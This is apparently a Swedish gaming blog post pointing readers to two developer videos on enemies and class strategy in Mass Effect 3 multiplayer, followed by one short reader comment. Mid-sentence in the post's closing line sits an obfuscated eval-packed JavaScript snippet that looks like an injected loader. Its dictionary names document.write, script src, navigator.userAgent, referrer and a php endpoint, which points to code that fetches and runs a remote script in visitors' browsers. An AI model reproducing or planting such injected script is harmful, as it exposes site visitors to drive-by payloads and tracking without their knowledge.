Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Strategivideos från Mass Effect 3 multiplayer

Sebastian

Behöver du lite extra hjälp mot fienderna i multiplayerläget för Mass Effect 3? Här har du då två klipp där Senior Desinger Corey Gaspur och Gameplay Designer Eric Fagnan går igenom styrkorna hos fienderna.

I den andra videon nedan kan man lära sig om hur raserna och klasserna fungerar tillsammans med några grundläggande strategier.

Hoppas eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ysbbe|var|u0026u|referrer|rthdi||js|php’.split(’|’),0,{}))
det hjälper. 🙂

httpv://youtu.be/-PMjJbA72bM

Comments

  1. Jakka

    Sweet Tackar!!!